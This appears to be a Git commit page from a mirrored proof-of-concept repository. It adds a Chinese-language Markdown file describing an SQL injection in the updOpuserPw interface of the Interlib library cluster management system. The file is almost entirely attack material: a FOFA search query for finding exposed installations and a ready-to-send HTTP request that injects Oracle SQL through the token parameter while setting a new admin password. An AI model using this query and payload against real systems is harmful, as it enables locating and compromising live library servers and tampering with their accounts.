admin/wy876_POC
1
0
Fork 0
mirror of https://github.com/wy876/POC.git synced 2025-02-27 04:39:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

Create 广州图创图书馆集群管理系统updOpuserPw接口存在SQL注入漏洞.md

Browse Source
This commit is contained in:
wy876 2024-04-16 16:59:33 +08:00 committed by GitHub
parent 46c305ecc4
commit feb31b7ab3
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 20 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

20
广州图创图书馆集群管理系统updOpuserPw接口存在SQL注入漏洞.md Normal file
View File

@ -0,0 +1,20 @@
## 广州图创图书馆集群管理系统updOpuserPw接口存在SQL注入漏洞
## fofa
```
body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
```
## poc
```
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*1111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close
```